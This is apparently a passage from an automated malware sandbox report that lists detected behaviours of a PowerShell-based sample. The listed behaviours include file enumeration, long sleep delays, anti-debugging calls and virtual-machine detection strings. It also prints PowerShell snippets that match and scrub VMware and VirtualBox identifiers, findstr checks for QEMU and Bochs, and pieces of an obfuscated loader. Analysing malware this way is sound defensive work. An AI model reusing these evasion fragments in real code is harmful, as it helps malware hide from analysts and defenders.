Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1CDD894 FindFirstFileExW,45_2_00000262F1CDD894
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,45_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1D0D894 FindFirstFileExW,45_2_00000262F1D0D894
Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,46_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023942B1D894 FindFirstFileExW,46_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF056DD894 FindFirstFileExW,47_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,47_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF0570D894 FindFirstFileExW,47_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,47_2_000001EF0570DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 00000035.00000002.2582402751.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000000.2144910472.000002A769A42000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxservice
Source: svchost.exe, 00000035.00000000.2144910472.000002A769A42000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxsf.sys
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
Source: svchost.exe, 00000030.00000002.2582876594.000002287A02B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.drBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dRomNECVMWarVMware_SATA_
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: cmd.exe, 00000014.00000003.1681248297.000002527D8A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000035.00000002.2643052755.000002A76AF0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.drBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemu-ga
Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdown
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: cmd.exe, 00000014.00000003.1690532569.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689954299.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1690299922.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1690649623.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1681785940.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689333508.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689704060.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1691446587.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1691192247.000002527D8C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: svchost.exe, 00000035.00000000.2147943830.000002A76A49A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicvss
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000035.00000002.2644921249.000002A76C0B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.drBinary or memory string: VMware
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxguest.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxguest.sys`
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.drBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmmouse.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemuwmi2i
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmusrvc2i
Source: cmd.exe, 00000014.00000003.1689147835.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1682224430.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689227342.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1682292513.000002527D8F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxsf.sys`
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: QEMU HARDDISK
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxmouse.sys`
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxmouse.sys
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.drBinary or memory string: $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\Program Files\VMware
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxMouse.sys
Source: svchost.exe, 00000035.00000000.2162013238.000002A76C164000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: lsass.exe, 0000002B.00000000.2078420703.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2573453748.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2086260407.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2563397137.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2097554251.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2563222103.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.2584284217.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2102410747.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2117344700.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2562685157.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.2580922407.000002A769A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
Source: cmd.exe, 00000014.00000003.1682224430.000002527D8F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAbHorsAGfLWFjJNrKHvWocR=e-Expression 'adnRtmnvxKrKceiWEAAFQW=ion '$TIMGz=qVaeeTRxshUrjZxfqxJBFkNYzLaL=lckmblckpblckrAfNoxIvdXhTBbvJNzCkKYxLKaXkycRIThPnjF=kmblck($Vcvep,AGZcOpprjzwDmCNlvINgjjZlHsYSLqNSSCis=lckSblckyblcksAhnCzrQTYKNgoLUmdjzOYMYqKajhkheLybvqwPqKmnHEAeKjNfwbgEgNiWSyiIJQFcHnpDPnTPBLfuQGqZueKdEUUHiAXSCEDQYywxUjqjircvINglhjoFgCxNsHvopanXhowrjTfkOBVnSyZuuLKtpYKwb=tALLUSERSPROFILE=C:\ProgramDataanDsspKbaAOnvXJVRvGTkogjNLOjOiH=e('blck', '');APPDATA=C:\Users\user\AppData\RoamingatmPoAjKkGZcJzXyyUynWvzDHvk=ty.CryptographaUGORSbYAjGEewLJLAkjASOdO=ct blckSblckybaUMtCDXIBRyZfMXCSGPuCVEiFWmumVX=on qVeuI($eXEDAuUOsIvFTJiTqAZpvwNE=y.PaddingMode]AWVLTAfgiDypHXCDErXpLpMtvtCO=blckib
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmmouse.sys`
Source: svchost.exe, 00000031.00000000.2117097116.000001B94D400000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: c:\program files\vmware
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxSF.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
Source: svchost.exe, 0000002C.00000002.2563397137.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandle
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002527DEECD80
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEE1E3C LoadLibraryA,GetProcAddress,SleepEx,20_2_000002527DEE1E3C
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEE11D4 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,20_2_000002527DEE11D4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002527DEECD80
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002527DEE84B0
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000002527DEE8814
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DF1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002527DF1CD80
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DF184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002527DF184B0
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DF18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000002527DF18814
Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000286D7D1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000286D7D1CD80
Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000286D7D184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000286D7D184B0
Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000286D7D18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00000286D7D18814
Source: C:\Windows\System32\conhost.exeCode function: 40_2_000001D54783CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000001D54783CD80
Source: C:\Windows\System32\conhost.exeCode function: 40_2_000001D5478384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000001D5478384B0
Source: C:\Windows\System32\conhost.exeCode function: 40_2_000001D547838814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_000001D547838814
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0922CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001EF0922CD80
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF09228814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_000001EF09228814
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF092284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001EF092284B0
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0942CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001EF0942CD80
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF09428814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_000001EF09428814
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF094284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001EF094284B0
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D1ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000001CA7D1ECD80
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D1E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_000001CA7D1E8814
